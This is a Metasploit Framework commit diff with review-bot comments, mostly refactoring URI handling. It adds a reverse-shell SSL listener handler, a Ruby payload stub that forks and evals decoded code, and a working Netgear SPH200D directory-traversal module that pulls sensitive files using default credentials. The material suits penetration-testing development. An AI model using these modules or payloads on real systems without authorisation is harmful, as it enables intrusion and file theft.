rescue ::Timeout::Error
Response.timed_out
rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
#rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout
# This is bad but we can't anticipate the gazilion different types of network
# i/o errors between Rex and Errno.
rescue => e
elog e.to_s
e.backtrace.each { |l| elog l }
Response.empty
end
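Review bot: The `rescue => e` added at the end of the request method catches every StandardError, not just the network errors the new comment describes, so a NoMethodError or ArgumentError in the request path is logged and converted to `Response.empty`, which the caller cannot tell apart from a connection failure. If the goal is only to widen the net beyond the three classes listed, `rescue ::IOError, ::SystemCallError, ::Rex::ConnectionError => e` covers the whole Errno family and Rex's connection exceptions without hiding bugs. The commented-out `#rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout` line above it should be deleted rather than left as dead text. The blanket rescue inside the thread body in the first hunk is more defensible, since isolating callback failures is exactly what its comment says it is for. The request method begins outside the hunk.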


@ -536,20 +536,21 @@ module Exploit::Remote::HttpClient
end
#
# Make sure the URI starts with a slash and doesn't end with one
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(str)
def normalize_uri(*strs)
new_str = strs * "/"
unless str.to_s[0,1] == "/"
str = "/" + str.to_s
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
str = str.gsub(/^\/+/, '/')
unless str.length == 1
str = str.gsub(/\/+$/, '')
end
str
new_str
end
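Review bot: `new_str = new_str.gsub!("//", "/") while new_str.index("//")` only works because the loop condition guarantees a match; `gsub!` returns nil when it changes nothing, so any later relaxation of the condition would silently set `new_str` to nil. `new_str = (strs * "/").squeeze("/")` collapses every run of slashes in one pass with no such dependency. Note also that the old trailing-slash removal is gone, so an input ending in `/` now keeps it; the rewritten comment reflects that, but callers that relied on the old behaviour should be checked. Since `strs * "/"` joins via `to_s`, a nil argument becomes an empty segment and just yields an extra slash that the collapse removes.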
#


@ -75,7 +75,8 @@ module Exploit::Remote::Web
def exploit
print_status "Sending HTTP request for #{path}"
if res = perform_request
res = perform_request
if res
print_status "The server responded with HTTP status code #{res.code}."
else
print_status 'The server did not respond to our request.'
@ -83,6 +84,12 @@ module Exploit::Remote::Web
handler
end
def tries
1
end
private
def perform_request
send_request_cgi({
'global' => true,
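Review bot: The new `tries` method has no doc comment and nothing in this hunk reads it, so its contract is unclear to a module author; if it is meant as an override hook, a line such as `# Number of attempts a module should make before giving up; override in modules that retry.` above it would say so. Separating `res = perform_request` from the `if` is a clear readability win over the assignment-in-condition form it replaces. The `exploit` method's body continues outside the hunk.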


@ -0,0 +1,300 @@
# -*- coding: binary -*-
module Msf
module Handler
###
#
# This module implements the reverse double TCP handler. This means
# that it listens on a port waiting for a two connections, one connection
# is treated as stdin, the other as stdout.
#
# This handler depends on having a local host and port to
# listen on.
#
###
module ReverseTcpDoubleSSL
include Msf::Handler
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_double'.
#
def self.handler_type
return "reverse_tcp_double_ssl"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Initializes the reverse TCP handler and ads the options that are required
# for all reverse TCP payloads, like local host and local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LHOST,
Opt::LPORT(4444)
], Msf::Handler::ReverseTcpDoubleSSL)
register_advanced_options(
[
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
], Msf::Handler::ReverseTcpDoubleSSL)
self.conn_threads = []
end
#
# Starts the listener but does not actually attempt
# to accept a connection. Throws socket exceptions
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
end
self.listener_sock = Rex::Socket::TcpServer.create(
# 'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'Comm' => comm,
'SSL' => true,
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
end
#
# Closes the listener socket if one was created.
#
def cleanup_handler
stop_handler
# Kill any remaining handle_connection threads that might
# be hanging around
conn_threads.each { |thr|
thr.kill
}
end
#
# Starts monitoring for an inbound connection.
#
def start_handler
self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) {
sock_inp = nil
sock_out = nil
print_status("Started reverse double handler")
begin
# Accept two client connection
begin
client_a = self.listener_sock.accept
print_status("Accepted the first client connection...")
client_b = self.listener_sock.accept
print_status("Accepted the second client connection...")
sock_inp, sock_out = detect_input_output(client_a, client_b)
rescue
wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
return nil
end
# Increment the has connection counter
self.pending_connections += 1
# Start a new thread and pass the client connection
# as the input and output pipe. Client's are expected
# to implement the Stream interface.
conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
begin
chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
handle_connection(chan.lsock)
rescue
elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
end
}
end while true
}
end
#
# Accept two sockets and determine which one is the input and which
# is the output. This method assumes that these sockets pipe to a
# remote shell, it should overridden if this is not the case.
#
def detect_input_output(sock_a, sock_b)
begin
# Flush any pending socket data
sock_a.get_once if sock_a.has_read_data?(0.25)
sock_b.get_once if sock_b.has_read_data?(0.25)
etag = Rex::Text.rand_text_alphanumeric(16)
echo = "echo #{etag};\n"
print_status("Command: #{echo.strip}")
print_status("Writing to socket A")
sock_a.put(echo)
print_status("Writing to socket B")
sock_b.put(echo)
print_status("Reading from sockets...")
resp_a = ''
resp_b = ''
if (sock_a.has_read_data?(1))
print_status("Reading from socket A")
resp_a = sock_a.get_once
print_status("A: #{resp_a.inspect}")
end
if (sock_b.has_read_data?(1))
print_status("Reading from socket B")
resp_b = sock_b.get_once
print_status("B: #{resp_b.inspect}")
end
print_status("Matching...")
if (resp_b.match(etag))
print_status("A is input...")
return sock_a, sock_b
else
print_status("B is input...")
return sock_b, sock_a
end
rescue ::Exception
print_status("Caught exception in detect_input_output: #{$!}")
end
end
#
# Stops monitoring for an inbound connection.
#
def stop_handler
# Terminate the listener thread
if (self.listener_thread and self.listener_thread.alive? == true)
self.listener_thread.kill
self.listener_thread = nil
end
if (self.listener_sock)
self.listener_sock.close
self.listener_sock = nil
end
end
protected
attr_accessor :listener_sock # :nodoc:
attr_accessor :listener_thread # :nodoc:
attr_accessor :conn_threads # :nodoc:
module TcpReverseDoubleSSLChannelExt
attr_accessor :localinfo
attr_accessor :peerinfo
end
###
#
# This class wrappers the communication channel built over the two inbound
# connections, allowing input and output to be split across both.
#
###
class TcpReverseDoubleSSLSessionChannel
include Rex::IO::StreamAbstraction
def initialize(framework, inp, out)
@framework = framework
@sock_inp = inp
@sock_out = out
initialize_abstraction
self.lsock.extend(TcpReverseDoubleSSLChannelExt)
self.lsock.peerinfo = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":")
self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":")
monitor_shell_stdout
end
#
# Funnel data from the shell's stdout to +rsock+
#
# +StreamAbstraction#monitor_rsock+ will deal with getting data from
# the client (user input). From there, it calls our write() below,
# funneling the data to the shell's stdin on the other side.
#
def monitor_shell_stdout
# Start a thread to pipe data between stdin/stdout and the two sockets
@monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) {
begin
while true
# Handle data from the server and write to the client
if (@sock_out.has_read_data?(0.50))
buf = @sock_out.get_once
break if buf.nil?
rsock.put(buf)
end
end
rescue ::Exception => e
ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}")
end
# Clean up the sockets...
begin
@sock_inp.close
@sock_out.close
rescue ::Exception
end
}
end
def write(buf, opts={})
@sock_inp.write(buf, opts)
end
def read(length=0, opts={})
@sock_out.read(length, opts)
end
#
# Closes the stream abstraction and kills the monitor thread.
#
def close
@monitor_thread.kill if (@monitor_thread)
@monitor_thread = nil
cleanup_abstraction
end
end
end
end
end
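Review bot: In `setup_handler` the `'LocalHost' => datastore['LHOST']` entry is commented out, so the SSL listener binds every interface regardless of LHOST and, unlike the sibling ReverseTcpSsl handler added in this commit, never honours a bind address; either restore the line or add a comment stating that the wildcard bind is intentional. The doc comment above `self.handler_type` says `'reverse_tcp_double'` while the method returns `"reverse_tcp_double_ssl"`. `detect_input_output` rescues `::Exception` and then falls off the end, so on any failure it returns nil and the listener increments `pending_connections` and spawns a session thread with both sockets nil, which only surfaces as an `elog` from the channel constructor; narrowing the rescue to `StandardError` and having the caller skip the spawn when `sock_inp.nil?` would make the failure visible. The `return nil` inside the listener thread's block is a `return` from a proc whose method (`start_handler`) has already returned, which raises LocalJumpError in the thread; `break` out of the `begin ... end while true` loop is what that branch needs.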


@ -0,0 +1,124 @@
require 'rex/socket'
require 'thread'
require 'msf/core/handler/reverse_tcp'
module Msf
module Handler
###
#
# This module implements the reverse TCP handler. This means
# that it listens on a port waiting for a connection until
# either one is established or it is told to abort.
#
# This handler depends on having a local host and port to
# listen on.
#
###
module ReverseTcpSsl
include Msf::Handler::ReverseTcp
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_ssl'.
#
def self.handler_type
return "reverse_tcp_ssl"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Initializes the reverse TCP SSL handler and adds the certificate option.
#
def initialize(info = {})
super
register_advanced_options(
[
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
], Msf::Handler::ReverseTcpSsl)
end
#
# Starts the listener but does not actually attempt
# to accept a connection. Throws socket exceptions
# if it fails to start the listener.
#
def setup_handler
if datastore['Proxies']
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
end
ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm']
if comm.to_s == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip|
begin
comm.extend(Rex::Socket::SslTcp)
self.listener_sock = Rex::Socket::SslTcpServer.create(
'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'Comm' => comm,
'SSLCert' => datastore['SSLCert'],
'Context' =>
{
'Msf' => framework,
'MsfPayload' => self,
'MsfExploit' => assoc_exploit
})
ex = false
comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
comm_used = Rex::Socket::Comm::Local if comm_used == nil
if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
via = "via the #{comm_used.type} on session #{comm_used.sid}"
else
via = ""
end
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
break
rescue
ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
end
}
raise ex if (ex)
end
end
end
end
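Review bot: Inside the `addrs.each { |ip| ... }` loop, `SslTcpServer.create` is passed `'LocalHost' => datastore['LHOST']` rather than `ip`, so the fallback to the ANY address that the preceding lines set up never happens: a failed bind retries the identical LHOST, and the success message names an address that was not actually bound. The line should read `'LocalHost' => ip,`. Relatedly, `addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")` compares the whole array to a string in its second clause and should be `addrs[0] == "::0"`. `comm.extend(Rex::Socket::SslTcp)` runs on every iteration and, when no ReverseListenerComm is configured, is applied to `nil` (the `else` branch sets `comm = nil`), which at best does nothing useful; guard it with `comm.extend(Rex::Socket::SslTcp) if comm`, or drop it if `SslTcpServer.create` already handles the SSL side.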


@ -479,4 +479,20 @@ class Msf::Module::Platform
Rank = 100
Alias = "php"
end
#
# JavaScript
#
class JavaScript < Msf::Module::Platform
Rank = 100
Alias = "js"
end
#
# Python
#
class Python < Msf::Module::Platform
Rank = 100
Alias = "python"
end
end


@ -0,0 +1,39 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Ruby
def initialize(info = {})
super(info)
register_advanced_options(
[
# Since space restrictions aren't really a problem, default this to
# true.
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
]
)
end
def prepends(buf)
if datastore['PrependFork']
buf = %Q^
code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen(%(ruby), %(wb)) rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end
^.strip.split(/\n/).map{|line| line.strip}.join("\n")
end
buf
end
end
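Review bot: `PrependFork` is declared with the String `"true"` as its default while the other OptBool added in this commit (`ReverseAllowProxy`) uses a bare boolean; pass `true` so the default does not depend on OptBool's string coercion: `Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ])`. `prepends` would benefit from a one-line comment above it saying that it wraps `buf` in a fork/popen stub when the option is set and returns `buf` unchanged otherwise. The `rescue nil` modifiers are inside the generated stager string rather than in this module's own control flow, so they are not a concern here.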


@ -0,0 +1,107 @@
# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Railgun
module Def
class Def_wldap32
def self.create_dll(dll_path = 'wldap32')
dll = DLL.new(dll_path, ApiConstants.manager)
dll.add_function('ldap_sslinitA', 'DWORD',[
['PCHAR', 'HostName', 'in'],
['DWORD', 'PortNumber', 'in'],
['DWORD', 'secure', 'in']
])
dll.add_function('ldap_bind_sA', 'DWORD',[
['DWORD', 'ld', 'in'],
['PCHAR', 'dn', 'in'],
['PCHAR', 'cred', 'in'],
['DWORD', 'method', 'in']
])
dll.add_function('ldap_search_sA', 'DWORD',[
['DWORD', 'ld', 'in'],
['PCHAR', 'base', 'in'],
['DWORD', 'scope', 'in'],
['PCHAR', 'filter', 'in'],
['PCHAR', 'attrs[]', 'in'],
['DWORD', 'attrsonly', 'in'],
['PDWORD', 'res', 'out']
])
dll.add_function('ldap_count_entries', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'res', 'in']
])
dll.add_function('ldap_first_entry', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'res', 'in']
])
dll.add_function('ldap_next_entry', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'entry', 'in']
])
dll.add_function('ldap_first_attributeA', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'entry', 'in'],
['DWORD', 'ptr', 'in']
])
dll.add_function('ldap_next_attributeA', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'entry', 'in'],
['DWORD', 'ptr', 'inout']
])
dll.add_function('ldap_count_values', 'DWORD',[
['DWORD', 'vals', 'in'],
])
dll.add_function('ldap_get_values', 'DWORD',[
['DWORD', 'ld', 'in'],
['DWORD', 'entry', 'in'],
['PCHAR', 'attr', 'in']
])
dll.add_function('ldap_value_free', 'DWORD',[
['DWORD', 'vals', 'in'],
])
dll.add_function('ldap_memfree', 'VOID',[
['DWORD', 'block', 'in'],
])
dll.add_function('ber_free', 'VOID',[
['DWORD', 'pBerElement', 'in'],
['DWORD', 'fbuf', 'in'],
])
dll.add_function('LdapGetLastError', 'DWORD',[])
dll.add_function('ldap_err2string', 'DWORD',[
['DWORD', 'err', 'in']
])
dll.add_function('ldap_msgfree', 'DWORD', [
['DWORD', 'res', 'in']
])
dll.add_function('ldap_unbind', 'DWORD', [
['DWORD', 'ld', 'in']
])
return dll
end
end
end; end; end; end; end; end; end
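Review bot: `create_dll` has no comment describing what it registers; a header such as `# Railgun definitions for the subset of wldap32.dll used for LDAP queries over a Meterpreter session.` would help. The `ptr` argument of `ldap_first_attributeA` is declared `'in'` while the same argument of `ldap_next_attributeA` is `'inout'`; if the underlying prototype takes `BerElement **` as I recall, the first call writes the BerElement pointer and `'out'` (or `'inout'`) is what lets callers pass it on to `ldap_next_attributeA` and `ber_free`, so this is worth confirming against the wldap32 headers. `ldap_err2string` and `ldap_get_values` return pointers declared as `'DWORD'`, which means callers must read the strings out of process memory themselves; a comment saying so would save the next user a surprise.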


@ -77,6 +77,7 @@ class Railgun
'netapi32',
'crypt32',
'wlanapi',
'wldap32'
].freeze
##


@ -342,7 +342,15 @@ class Console::CommandDispatcher::Core
return
end
print_status("Migrating to #{pid}...")
begin
server = client.sys.process.open
rescue TimeoutError => e
elog(e.to_s)
rescue RequestError => e
elog(e.to_s)
end
server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}")
# Do this thang.
client.core.migrate(pid)
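Review bot: The two rescue arms around `client.sys.process.open` do the same thing and can be folded into one: `rescue TimeoutError, RequestError => e` followed by `elog(e.to_s)`. Because the failure is only written to the log, the console user gets no hint that the source pid could not be resolved; a `print_warning` there would be consistent with the status messages around it. The ternary `server ? print_status(...) : print_status(...)` is two side-effecting calls in one expression; building the message first and printing it once reads better. The method body continues outside the hunk.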


@ -129,7 +129,7 @@ class Console::CommandDispatcher::Stdapi::Ui
def cmd_screenshot( *args )
path = Rex::Text.rand_text_alpha(8) + ".jpeg"
quality = 50
view = true
view = false
screenshot_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],


@ -75,6 +75,7 @@ class Metasploit4 < Msf::Auxiliary
begin
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',


@ -0,0 +1,121 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Netgear SPH200D Directory Traversal Vulnerability',
'Description' => %q{
This module exploits a directory traversal vulnerablity which is present in
Netgear SPH200D Skype telephone.
},
'References' =>
[
[ 'BID', '57660' ],
[ 'EDB', '24441' ],
[ 'URL', 'http://support.netgear.com/product/SPH200D' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ]
],
'Author' => [ 'm-1-k-3' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]),
OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
OptString.new('PASSWORD',[ true, 'Password to login with', 'password'])
], self.class)
end
def extract_words(wordfile)
return [] unless wordfile && File.readable?(wordfile)
begin
words = File.open(wordfile, "rb") do |f|
f.read
end
rescue
return []
end
save_array = words.split(/\r?\n/)
return save_array
end
#traversal every file
def find_files(file,user,pass)
traversal = '/../../'
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(traversal, file),
'basic_auth' => "#{user}:#{pass}"
})
if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
report_web_vuln({
:host => rhost,
:port => rport,
:vhost => datastore['VHOST'],
:path => "/",
:pname => normalize_uri(traversal, file),
:risk => 3,
:proof => normalize_uri(traversal, file),
:name => self.fullname,
:category => "web",
:method => "GET"
})
loot = store_loot("lfi.data","text/plain",rhost, res.body,file)
vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")
elsif res and res.code
vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}")
end
end
def run_host(ip)
user = datastore['USERNAME']
pass = datastore['PASSWORD']
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
#test login
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET',
'basic_auth' => "#{user}:#{pass}"
})
return :abort if res.nil?
return :abort if (res.headers['Server'].nil? or res.headers['Server'] !~ /simple httpd/)
return :abort if (res.code == 404)
if [200, 301, 302].include?(res.code)
vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
else
vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
return :abort
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return :abort
end
extract_words(datastore['FILELIST']).each do |file|
find_files(file,user,pass) unless file.empty?
end
end
end
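Review bot: `find_files` evaluates `normalize_uri(traversal, file)` three times (request URI, `:pname`, `:proof`); compute it once, `uri = normalize_uri(traversal, file)`, and reuse it so the reported proof is guaranteed to match what was sent. In `run_host`, a 301/302 response is counted as a successful login, yet a redirect is a common reply to rejected basic auth, so the check is presumably only right for this device's `simple httpd` banner — a comment saying so would stop the pattern being copied. `extract_words` silently returns `[]` on read errors, so an unreadable FILELIST makes the module report nothing; a `print_error` in that branch would be more helpful. The `ip` parameter of `run_host` is unused in favour of `rhost`; naming it `_ip` makes that explicit.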


@ -96,7 +96,9 @@ class Metasploit4 < Msf::Auxiliary
juhash = Digest::MD5.hexdigest(juarray)
juhash = juhash[0..9] # shortMD5 value for use as juhash
file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
uri_base_path = normalize_uri(uri, '/index.php')
file_uri = "#{uri_base_path}?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
begin


@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
def run
print_status("Establishing a connection to the target...")
uri = normalize_uri(datastore['URI'])
rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
rpath = uri + "?days=1&offset=0&sort_mode="
res = send_request_raw({
'uri' => rpath,


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
def run
begin
o = {
'uri' => normalize_uri(datastore['URI']) || '/',
'uri' => normalize_uri(datastore['URI']),
'headers' => {
'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
}


@ -55,9 +55,17 @@ class Metasploit3 < Msf::Auxiliary
# Call the User site, so the db statement will be cached
def cache_user_info(user_id)
user_url = normalize_uri("/#{wordpress_url}?author=#{user_id}")
user_url = normalize_uri(wordpress_url)
begin
send_request_cgi({ "uri" => user_url, "method" => "GET" })
send_request_cgi(
{
"uri" => user_url,
"method" => "GET",
"vars_get" => {
"author" => user_id.to_s
}
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
vprint_error("Unable to connect to #{url}")
return nil
@ -83,7 +91,8 @@ class Metasploit3 < Msf::Auxiliary
key="w3tc_#{host}_#{site_id}_sql_#{query_md5}"
key_md5 = ::Rex::Text.md5(key)
hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}"
url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache#{hash_path}")
url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache")
uri << hash_path
result = nil
begin
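Review bot: After `url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache")`, the next line appends to `uri` rather than `url` (`uri << hash_path`); unless `uri` is defined elsewhere in the method this raises NoMethodError on nil, and if it is, the cache path never reaches the request. The line should read `url << hash_path`. In the first hunk, the existing connection-refused message interpolates `#{url}` while the variable in scope there is `user_url`. Both hunks are inside methods that continue outside the hunk.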


@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def proto
'ftp'
@ -28,7 +29,11 @@ class Metasploit3 < Msf::Auxiliary
Although the daemon runs with SYSTEM privileges, access is limited to files
that reside on the same drive as the FTP server's root directory.
},
'Author' => 'jduck',
'Author' =>
[
'jduck',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>',
],
'License' => MSF_LICENSE,
'References' =>
[
@ -47,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
def run_host(ip)
connect_login
@ -55,7 +60,8 @@ class Metasploit3 < Msf::Auxiliary
res = send_cmd( ['XCRC', path, "0", "9999999999"], true )
if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./)
raise RuntimeError, "Unable to obtain file size! File probably doesn't exist."
print_error("Unable to obtain file size! File probably doesn't exist.")
return
end
file_size = $1.to_i
@ -94,6 +100,7 @@ class Metasploit3 < Msf::Auxiliary
fname = datastore['PATH'].gsub(/[\/\\]/, '_')
p = store_loot("titanftp.traversal", "text/plain", "rhost", file_data, fname)
print_status("Saved in: #{p}")
vprint_status(file_data.inspect)
disconnect
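Review bot: The `print_error` plus `return` that replaces the `raise` at the XCRC check exits `run_host` before the `disconnect` at the end of the method, so the FTP connection opened by `connect_login` is left open for every host on which the file is missing; add `disconnect` before the `return`, or wrap the body in `begin ... ensure disconnect end`. Converting `run` to `run_host(ip)` matches the newly included `Msf::Auxiliary::Scanner`. The `store_loot` call passes the literal string `"rhost"` as the host argument — pre-existing, but `rhost` is presumably intended. The body of `run_host` is split across the remaining hunks of this file.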


@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
print_status("#{rhost}:#{rport} - Sending request...")
uri = normalize_uri(target_uri.to_s)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',


@ -57,7 +57,7 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(ip)
uri = normalize_uri(target_uri.to_s)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET'})
@ -71,7 +71,7 @@ class Metasploit4 < Msf::Auxiliary
end
def accessfile(rhost)
uri = normalize_uri(target_uri.to_s)
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'


@ -49,8 +49,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
base = normalize_uri(target_uri.path)
base << '/' if base[-1,1] != '/'
base = target_uri.path
peer = "#{ip}:#{rport}"
fname = datastore['FILE']
@ -61,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({
'method' => 'GET',
'encode_params' => false,
'uri' => "#{base}gmap/view_overlay.php",
'uri' => normalize_uri(base, "gmap/view_overlay.php"),
'vars_get' => {
'overlay_type' => "#{traverse}#{fname}%00"
}


@ -46,7 +46,6 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
base = normalize_uri(target_uri.path)
base << '/' if base[-1,1] != '/'
peer = "#{ip}:#{rport}"
@ -58,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{base}index.php",
'uri' => normalize_uri(base, "index.php"),
'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
})


@ -44,10 +44,10 @@ class Metasploit4 < Msf::Auxiliary
end
def run_host(rhost)
url = normalize_uri(datastore['URI'])
url = normalize_uri(datastore['URI'], '/index.php/members')
begin
res = send_request_raw({'uri' => "#{url}/index.php/members"})
res = send_request_raw({'uri' => url})
rescue ::Rex::ConnectionError
print_error("#{peer} Unable to connect to #{url}")


@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@uri = normalize_uri(target_uri)
@uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
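Review bot: `normalize_uri` returns a String, so the unchanged next line `@uri.path << "/" if @uri.path[-1, 1] != "/"` raises NoMethodError on `path` now that `@uri` is built from `target_uri.path`; replace it with `@uri << "/" if @uri[-1, 1] != "/"`, or drop it and join sub-paths with `normalize_uri` where `@uri` is used. The `run` method continues outside the hunk.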


@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
headers['Content-Type'] = ctype if ctype != nil
headers['Content-Length'] = data.length if data != nil
uri = normalize_uri(target_uri)
uri = normalize_uri(target_uri.path)
res = send_request_raw({
'uri' => "#{uri}#{path}",
'method' => method,
@ -218,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary
#Get GlassFish version
edition, version, banner = get_version(res)
path = normalize_uri(datastore['PATH'])
path = normalize_uri(target_uri.path)
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
print_status("#{target_url} - GlassFish - Attempting authentication")
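Review bot: With `path = normalize_uri(target_uri.path)` the value always begins with a slash, so `target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"` now produces `host:port//path`; drop the literal slash: `target_url = "http://#{rhost}:#{rport}#{path}"`. The same doubling appears in the first hunk, where `'uri' => "#{uri}#{path}"` concatenates two pieces that may both carry slashes; `'uri' => normalize_uri(target_uri.path, path)` is the form the rest of this commit uses. The scheme in the status URL is hard-coded to `http` even when the module is configured for SSL, which is cosmetic but misleading. Both hunks are inside methods that start outside the hunk.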


